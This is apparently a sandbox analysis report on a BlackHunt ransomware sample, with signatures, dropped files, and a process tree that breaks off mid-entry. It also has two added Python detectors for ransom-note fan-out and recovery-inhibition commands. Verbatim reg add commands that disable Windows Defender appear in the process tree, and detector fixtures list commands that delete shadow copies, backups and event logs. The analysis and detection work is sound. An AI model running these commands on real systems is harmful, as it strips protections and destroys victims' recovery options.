Analysis
max time kernel: 152s
max time network: 161s
platform: windows7_x64
resource: win7-20231215-en
resource tags: arch:x64, arch:x86, image:win7-20231215-en, locale:en-us, os:windows7-x64, system
submitted: 19/01/2024, 00:41
Static task: static1
Behavioral task: behavioral1
  Sample: ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe
  Resource: win7-20231215-en
Behavioral task: behavioral2
  Sample: ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe
  Resource: win10v2004-20231222-en
General
Target: ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe
Size: 707KB
MD5: ae6b8f7bf28132447284f9e2b78278a5
SHA1: c26cc4c9f05ab7dc0073701c8eba5b7b873667b2
SHA256: ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982
SHA512: 3f988594d422eeef5b2a00b637c894e8fc4b51ade5eaa7c74c42ed385f83536f156d2d1ca002d83697017f0ccf79725b3f4bda2332e1bc62fe71cfd3cbe76996
SSDEEP: 6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza188Tvnh:6uaTmkZJ+naie5OTamgEoKxLWHTh
Malware Config
Extracted
Ransom note: C:\ProgramData\#BlackHunt_ReadMe.hta
Contact URL (Tor hidden service, taken from the note): http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The NTFS USN change journal is a per-volume, persistent log of file and directory changes; it exists on every NTFS volume, not only on Windows Server. Ransomware deletes it (normally with fsutil usn deletejournal) to remove the timeline that forensic tooling uses to reconstruct which files were renamed or overwritten.
PID 1696 fsutil.exe; PID 2108 fsutil.exe
Modifies Windows Defender Real-time Protection settings 2 IoCs
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection (reg.exe)
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" (reg.exe)
UAC bypass 1 IoCs
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (the sample, ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe, PID 1360)
EnableLUA = 0 switches UAC off outright rather than bypassing a prompt; the change only takes effect after the next reboot, so it matters for re-execution and for the interactive operator, not for this run.
Clears Windows event logs 1 TTPs 5 IoCs
PID 2624 wevtutil.exe; PID 836 wevtutil.exe; PID 1568 wevtutil.exe; PID 2164 wevtutil.exe; PID 2532 wevtutil.exe
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
PID 2188 bcdedit.exe; PID 2872 bcdedit.exe; PID 2504 bcdedit.exe; PID 2944 bcdedit.exe
(PID 2188 also appears below as vssadmin.exe: the sandbox reuses PIDs during the run, so PID alone does not identify a process here.)
Renames multiple (2863) files with added filename extension
Bulk renaming that appends one extension is the file-system signature of in-place encryption. The extension is presumably .Hunt2, the one the sample registers under HKLM\Software\Classes (see "Modifies registry class"); the individual rename events are not listed in this report.
Runs wbadmin.exe 2 IoCs
PID 2976 wbadmin.exe; PID 2496 wbadmin.exe
wbadmin is the Windows Backup command-line tool; ransomware invokes it to delete the backup catalog and system-state backups. The arguments are not captured here, but the SeBackupPrivilege/SeRestorePrivilege use by wbengine.exe (under "Suspicious use of AdjustPrivilegeToken") confirms the backup engine was driven.
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" (reg.exe)
The Run value points at the .hta ransom note, not at the encryptor, so what persists across logons is the extortion message (rendered by mshta.exe), not the encryption routine.
Checks whether UAC is enabled 1 IoCs
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (the sample)
Enumerates connected drives 3 TTPs 26 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
The sample opened (read-only) \??\A:, \??\B:, \??\E:, \??\G:, \??\H:, \??\I:, \??\J:, \??\K:, \??\L:, \??\M:, \??\N:, \??\O:, \??\P:, \??\Q:, \??\R:, \??\S:, \??\T:, \??\U:, \??\V:, \??\W:, \??\X:, \??\Y:, \??\Z: (23 IoCs)
fsutil.exe opened (read-only) \??\F:, \??\M: (2 IoCs)
vssadmin.exe opened (read-only) \??\F: (1 IoC)
The sample probes every letter A: through Z:, i.e. removable media and mapped network drives as well as fixed disks. Read together with the EnableLinkedConnections = 1 policy write (see "System policy modification"), this is how an elevated encryptor reaches shares that were mapped in the user's non-elevated session.
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow 2: ip-api.com
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Set value (str) \REGISTRY\USER\S-1-5-21-1268429524-3929314613-1992311491-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" (the sample)
Drops file in Program Files directory 64 IoCs
All 64 entries are by the sample. Two kinds of event are mixed in the list: "File created" entries are ransom notes (#BlackHunt_ReadMe.txt / #BlackHunt_ReadMe.hta) and #BlackHunt_Private.key files dropped into directories as they are visited; "File opened for modification" entries are existing data files being overwritten in place, i.e. encryption targets.
File created (25):
C:\Program Files\VideoLAN\VLC\plugins\d3d9\#BlackHunt_Private.key
C:\Program Files\VideoLAN\VLC\plugins\keystore\#BlackHunt_ReadMe.txt
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\#BlackHunt_ReadMe.txt
C:\Program Files\VideoLAN\VLC\locale\et\#BlackHunt_ReadMe.hta
C:\Program Files\VideoLAN\VLC\locale\zh_CN\#BlackHunt_ReadMe.txt
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\#BlackHunt_ReadMe.txt
C:\Program Files\VideoLAN\VLC\locale\gl\LC_MESSAGES\#BlackHunt_ReadMe.hta
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\#BlackHunt_ReadMe.txt
C:\Program Files\Java\jre7\lib\management\#BlackHunt_Private.key
C:\Program Files\VideoLAN\VLC\locale\lt\#BlackHunt_ReadMe.hta
C:\Program Files\VideoLAN\VLC\lua\#BlackHunt_ReadMe.hta
C:\Program Files\VideoLAN\VLC\plugins\packetizer\#BlackHunt_Private.key
C:\Program Files\Java\jdk1.7.0_80\#BlackHunt_ReadMe.hta
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\#BlackHunt_ReadMe.hta
C:\Program Files\VideoLAN\VLC\locale\nn\#BlackHunt_ReadMe.hta
C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\#BlackHunt_ReadMe.txt
C:\Program Files\Java\jre7\bin\server\#BlackHunt_ReadMe.txt
C:\Program Files\VideoLAN\VLC\locale\mn\#BlackHunt_Private.key
C:\Program Files\DVD Maker\Shared\#BlackHunt_ReadMe.hta
C:\Program Files\Java\jre7\lib\zi\America\Indiana\#BlackHunt_Private.key
C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\#BlackHunt_ReadMe.hta
C:\Program Files\VideoLAN\VLC\locale\sq\#BlackHunt_ReadMe.hta
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\#BlackHunt_ReadMe.hta
C:\Program Files (x86)\#BlackHunt_Private.key
C:\Program Files\VideoLAN\VLC\plugins\stream_out\#BlackHunt_ReadMe.hta
File opened for modification (39):
C:\Program Files\7-Zip\Lang\fur.txt
C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\NavigationLeft_ButtonGraphic.png
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\feature.properties
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.syntheticattribute.exsd
C:\Program Files\Java\jre7\lib\zi\Pacific\Enderbury
C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-services_zh_CN.jar
C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-host-views.jar
C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-tools.jar
C:\Program Files\VideoLAN\VLC\lua\playlist\liveleak.luac
C:\Program Files\VideoLAN\VLC\lua\http\view.html
C:\Program Files\7-Zip\7-zip.chm
C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\java.security
C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kathmandu
C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SceneButtonInset_Alpha2.png
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\ECLIPSE_.RSA
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin_2.0.100.v20131209-2144.jar
C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-compat_ja.jar
C:\Program Files\Java\jre7\lib\zi\Etc\GMT-5
C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Anchorage
C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Vienna
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.common_5.5.0.165303.jar
C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-loaders_zh_CN.jar
C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-bootstrap.xml
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini
C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\vlc.mo
C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Chatham
C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm
C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Montreal
C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-api_ja.jar
C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-util-enumerations.xml
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\license.html
C:\Program Files\DVD Maker\Shared\DvdStyles\shadowonlyframe_videoinset.png
C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Rothera
C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToScenesBackground_PAL.wmv
C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsMainToScenesBackground_PAL.wmv
C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Oslo
C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-awt.jar
C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Dawson_Creek
C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Dubai
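The drop list above shows the two file-system tells of an encryptor in one trace: the same note filename created in directory after directory, and bulk renames that append a single new extension. The following is an added example (not part of the sandbox output) that scores both from file events. The created/modified paths are taken from the list above; the rename events are constructed, because the report counts 2863 renames but does not list them, and use the .Hunt2 extension the sample registers under HKLM\Software\Classes.

```python
"""Spot ransom-note fan-out and appended-extension renames in file events.

Added example for this sandbox report, not part of the report itself. The
created/modified paths come from the report; the rename events are an
assumption (the report counts 2863 renames but lists none).
"""
import ntpath
from collections import Counter, defaultdict

# (action, path) or (action, old_path, new_path) for renames. Constructed sample.
SAMPLE_EVENTS = [
    ("created", r"C:\Program Files\VideoLAN\VLC\plugins\d3d9\#BlackHunt_Private.key"),
    ("created", r"C:\Program Files\VideoLAN\VLC\plugins\keystore\#BlackHunt_ReadMe.txt"),
    ("created", r"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\#BlackHunt_ReadMe.txt"),
    ("created", r"C:\Program Files\VideoLAN\VLC\locale\et\#BlackHunt_ReadMe.hta"),
    ("created", r"C:\Program Files\Java\jdk1.7.0_80\#BlackHunt_ReadMe.hta"),
    ("created", r"C:\Program Files\DVD Maker\Shared\#BlackHunt_ReadMe.hta"),
    ("created", r"C:\Program Files (x86)\#BlackHunt_Private.key"),
    ("modified", r"C:\Program Files\7-Zip\Lang\fur.txt"),
    ("modified", r"C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\java.security"),
    ("modified", r"C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm"),
    # Assumed rename events: the report does not list them.
    ("renamed", r"C:\Program Files\7-Zip\Lang\fur.txt",
                r"C:\Program Files\7-Zip\Lang\fur.txt.Hunt2"),
    ("renamed", r"C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\java.security",
                r"C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\java.security.Hunt2"),
    ("renamed", r"C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm",
                r"C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm.Hunt2"),
    ("renamed", r"C:\Program Files\7-Zip\7-zip.chm",
                r"C:\Program Files\7-Zip\7-zip.chm.Hunt2"),
    # An ordinary rename for contrast: the extension is replaced, not appended.
    ("renamed", r"C:\Users\Admin\Documents\report.tmp",
                r"C:\Users\Admin\Documents\report.docx"),
]


def note_fanout(events, min_dirs=3):
    """Map each created filename to the directories it was created in,
    keeping only names that appear in at least min_dirs distinct directories."""
    dirs_by_name = defaultdict(set)
    for ev in events:
        if ev[0] == "created":
            directory, name = ntpath.split(ev[1])   # ntpath: Windows paths on any host
            dirs_by_name[name.lower()].add(directory)
    return {name: sorted(d) for name, d in dirs_by_name.items() if len(d) >= min_dirs}


def appended_extensions(events):
    """Count renames where the new name is the old name plus a trailing extension."""
    counts = Counter()
    for ev in events:
        if ev[0] == "renamed":
            old, new = ev[1], ev[2]
            if new.startswith(old) and len(new) > len(old):
                counts[ntpath.splitext(new)[1].lower()] += 1
    return counts


def looks_like_ransomware(events, min_dirs=3, min_renames=3):
    """Verdict: a note name fanned out across directories AND one appended
    extension seen on at least min_renames files."""
    notes = note_fanout(events, min_dirs)
    top = appended_extensions(events).most_common(1)
    verdict = bool(notes) and bool(top) and top[0][1] >= min_renames
    return {
        "verdict": verdict,
        "notes": sorted(notes),
        "extension": top[0][0] if top else None,
        "renames": top[0][1] if top else 0,
    }


if __name__ == "__main__":
    print(looks_like_ransomware(SAMPLE_EVENTS))
```

With the thresholds above only #BlackHunt_ReadMe.hta (three directories in the sample) counts as fan-out; lowering min_dirs to 2 also surfaces the .txt note and the .key file. The appended-extension check deliberately ignores renames that replace an extension, which is what normal applications do when they save through a temporary file.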
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
PID 1700 schtasks.exe
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
PID 2040 vssadmin.exe; PID 1980 vssadmin.exe; PID 1036 vssadmin.exe; PID 2120 vssadmin.exe; PID 1884 vssadmin.exe; PID 2188 vssadmin.exe
Kills process with taskkill 1 IoCs
PID 3092 taskkill.exe
Modifies registry class 10 IoCs
Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 (reg.exe)
Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon (reg.exe)
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ (reg.exe)
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" (reg.exe)
Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 (reg.exe)
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ (reg.exe)
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2 (bcdedit.exe)
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon (bcdedit.exe)
Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon (bcdedit.exe)
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" (bcdedit.exe)
Net effect: files carrying the .Hunt2 extension show #BlackHunt_Icon.ico in Explorer. The four entries attributed to bcdedit.exe are almost certainly a PID-reuse artefact of the trace (bcdedit.exe does not write file-association keys); they belong to the reg.exe instances in the process tree.
Runs ping.exe 1 TTPs 1 IoCs
PID 3316 PING.EXE
(Arguments are not captured; ransomware commonly uses ping as a sleep before self-deletion.)
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
PID 3276 mshta.exe
Suspicious use of AdjustPrivilegeToken 24 IoCs
PID 1360 the sample: SeDebugPrivilege, SeRestorePrivilege, SeBackupPrivilege, SeTakeOwnershipPrivilege, SeAuditPrivilege, SeSecurityPrivilege, SeIncBasePriorityPrivilege (7)
PID 2836 vssvc.exe: SeBackupPrivilege, SeRestorePrivilege, SeAuditPrivilege (3)
PID 2208 wbengine.exe: SeBackupPrivilege, SeRestorePrivilege, SeSecurityPrivilege (3)
PID 2164 wevtutil.exe: SeSecurityPrivilege, SeBackupPrivilege (2)
PID 2532 wevtutil.exe: SeSecurityPrivilege, SeBackupPrivilege (2)
PID 2624 wevtutil.exe: SeSecurityPrivilege, SeBackupPrivilege (2)
PID 836 wevtutil.exe: SeSecurityPrivilege, SeBackupPrivilege (2)
PID 1568 wevtutil.exe: SeSecurityPrivilege, SeBackupPrivilege (2)
PID 3092 taskkill.exe: SeDebugPrivilege (1)
SeBackupPrivilege, SeRestorePrivilege and SeTakeOwnershipPrivilege together let the sample read and overwrite files regardless of their ACLs; SeSecurityPrivilege is the right wevtutil needs to clear the Security log, so the five wevtutil instances are the "Clears Windows event logs" IoCs seen from the token side.
Suspicious use of WriteProcessMemory 64 IoCs
Each child launch is logged several times because the parent writes into the new process more than once while CreateProcess sets it up. Collapsed by parent/child pair, the 64 events are:
parent 1360 (the sample) -> child 2688 cmd.exe, procid_target 29, 4 events
parent 1360 (the sample) -> child 1508 cmd.exe, procid_target 152, 4 events
parent 1360 (the sample) -> child 2852 cmd.exe, procid_target 30, 4 events
parent 1360 (the sample) -> child 2988 cmd.exe, procid_target 150, 4 events
parent 1360 (the sample) -> child 2756 cmd.exe, procid_target 33, 4 events
parent 1508 cmd.exe -> child 2276, procid_target 148, 3 events
parent 2688 cmd.exe -> child 2676 reg.exe, procid_target 35, 3 events
parent 2988 cmd.exe -> child 2872 bcdedit.exe, procid_target 106, 3 events
parent 2852 cmd.exe -> child 2596 reg.exe, procid_target 36, 3 events
parent 1360 (the sample) -> child 3064 cmd.exe, procid_target 38, 4 events
parent 1360 (the sample) -> child 2908 cmd.exe, procid_target 39, 4 events
parent 1360 (the sample) -> child 2560 cmd.exe, procid_target 40, 4 events
parent 1360 (the sample) -> child 2572 cmd.exe, procid_target 42, 4 events
parent 2756 cmd.exe -> child 2608 reg.exe, procid_target 146, 3 events
parent 1360 (the sample) -> child 2616, procid_target 145, 4 events
parent 1360 (the sample) -> child 2636 cmd.exe, procid_target 50, 4 events
parent 1360 (the sample) -> child 2476 cmd.exe, procid_target 94, 4 events
parent 1360 (the sample) -> child 2860 cmd.exe, procid_target 45, 1 event (list truncated at 64 entries)
System policy modification 1 TTPs 3 IoCs
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System (the sample)
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (the sample)
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" (the sample)
EnableLinkedConnections = 1 makes drive letters mapped under the user's standard token visible to the elevated token as well, so an elevated encryptor can reach mapped network shares that UAC's split token would otherwise hide from it.
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
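The signatures above (shadow copies, wbadmin, bcdedit, wevtutil, fsutil) are the standard "inhibit system recovery" cluster, and what makes them an alert rather than five separate low-confidence hits is that they all trace back to one originating process. The following is an added example (not part of the sandbox output) that correlates such events by walking parent-PID links. The records are constructed Sysmon-style process-creation events: images and PIDs mirror this report, but the argument strings are the usual ones for each technique and are an assumption, since the report only records which binaries ran.

```python
"""Correlate recovery-inhibition LOLBin launches back to one originating process.

Added example for this sandbox report, not part of the report itself. The
sample events are constructed: PIDs and images follow the report, the
command-line arguments are assumed (the report does not record them).
"""
import re
from collections import defaultdict

DROPPER = "ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe"

# One pattern per technique, matched case-insensitively on the de-quoted command line.
RECOVERY_INHIBITION = {
    "shadow_copy_delete":    re.compile(r"\bvssadmin(?:\.exe)?\b.*\bdelete\s+shadows\b", re.I),
    "shadow_storage_resize": re.compile(r"\bvssadmin(?:\.exe)?\b.*\bresize\s+shadowstorage\b", re.I),
    "backup_catalog_delete": re.compile(r"\bwbadmin(?:\.exe)?\b.*\bdelete\s+(?:catalog|backup|systemstatebackup)\b", re.I),
    "boot_recovery_disable": re.compile(r"\bbcdedit(?:\.exe)?\b.*(?:recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)", re.I),
    "event_log_clear":       re.compile(r"\bwevtutil(?:\.exe)?\s+(?:cl|clear-log)\b", re.I),
    "usn_journal_delete":    re.compile(r"\bfsutil(?:\.exe)?\b.*\busn\s+deletejournal\b", re.I),
}

# Constructed Sysmon Event ID 1 style records: pid, ppid, image, command line.
SAMPLE_EVENTS = [
    {"pid": 1360, "ppid": 1000, "image": DROPPER,
     "cmdline": '"C:\\Users\\Admin\\AppData\\Local\\Temp\\' + DROPPER + '"'},
    {"pid": 2988, "ppid": 1360, "image": "cmd.exe",
     "cmdline": '"C:\\Windows\\System32\\cmd.exe" /c bcdedit /set {default} recoveryenabled no'},
    {"pid": 2872, "ppid": 2988, "image": "bcdedit.exe",
     "cmdline": "bcdedit /set {default} recoveryenabled no"},
    {"pid": 2040, "ppid": 1360, "image": "vssadmin.exe",
     "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"pid": 2976, "ppid": 1360, "image": "wbadmin.exe",
     "cmdline": "wbadmin.exe delete catalog -quiet"},
    {"pid": 2624, "ppid": 1360, "image": "wevtutil.exe",
     "cmdline": "wevtutil.exe cl Security"},
    {"pid": 1696, "ppid": 1360, "image": "fsutil.exe",
     "cmdline": "fsutil.exe usn deletejournal /D C:"},
    # Administrator activity that must not alert: read-only queries, parent not in the trace.
    {"pid": 4100, "ppid": 4000, "image": "vssadmin.exe",
     "cmdline": "vssadmin.exe list shadows"},
    {"pid": 4200, "ppid": 4000, "image": "wevtutil.exe",
     "cmdline": "wevtutil.exe qe Security /c:5"},
]


def match_techniques(cmdline):
    """Return the set of technique names whose pattern matches this command line."""
    flat = cmdline.replace('"', "")   # quoting around paths must not break \b matching
    return {name for name, rx in RECOVERY_INHIBITION.items() if rx.search(flat)}


def root_ancestor(pid, by_pid):
    """Walk ppid links upward while the parent is itself in the trace; the last
    PID reached is the originating process (the loader, not the cmd.exe wrapper)."""
    seen = set()
    while pid in by_pid and by_pid[pid]["ppid"] in by_pid and pid not in seen:
        seen.add(pid)
        pid = by_pid[pid]["ppid"]
    return pid


def find_recovery_inhibition(events, min_distinct=2):
    """Group technique hits by originating process; alert when one root
    accounts for at least min_distinct distinct techniques."""
    by_pid = {e["pid"]: e for e in events}
    per_root = defaultdict(set)
    for e in events:
        hits = match_techniques(e["cmdline"])
        if hits:
            per_root[root_ancestor(e["pid"], by_pid)].update(hits)
    return {root: sorted(t) for root, t in per_root.items() if len(t) >= min_distinct}


if __name__ == "__main__":
    for root, techniques in find_recovery_inhibition(SAMPLE_EVENTS).items():
        print("root PID %d: %s" % (root, ", ".join(techniques)))
```

The cmd.exe wrapper and the bcdedit.exe it spawns both match the same pattern, but they collapse onto root PID 1360, so the wrapper does not inflate the count. Requiring at least two distinct techniques per root is what keeps a lone administrator running vssadmin delete shadows out of the alert.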
Processes
Indentation shows parent/child depth. Command lines are reproduced verbatim from the trace. Two values in the reg add chain are worth decoding: Windows Defender's ThreatSeverityDefaultAction = 6 means "Allow" for that severity, and Spynet\SubmitSamplesConsent = 2 means "never send samples".

[1] C:\Users\Admin\AppData\Local\Temp\ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe
    cmd: "C:\Users\Admin\AppData\Local\Temp\ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe"
    PID: 1360
    signatures: UAC bypass; Checks whether UAC is enabled; Enumerates connected drives; Sets desktop wallpaper using registry; Drops file in Program Files directory; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory; System policy modification

  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
      PID: 2688
      signatures: Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
        PID: 2676
        signatures: Modifies registry class

  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
      PID: 2852
      signatures: Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
        PID: 2596
        signatures: Modifies registry class

  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
      PID: 2756
      signatures: Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
        PID: 2608
        signatures: Adds Run key to start application

  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      PID: 3064
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
        PID: 2052

  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
      PID: 2908
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
        PID: 632
        signatures: Modifies Windows Defender Real-time Protection settings

  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
      PID: 2560
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
        PID: 796

  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
      PID: 2572
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
        PID: 2800

  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
      PID: 2476
      (no reg.exe child recorded for this instance)

  [2] C:\Windows\System32\cmd.exe
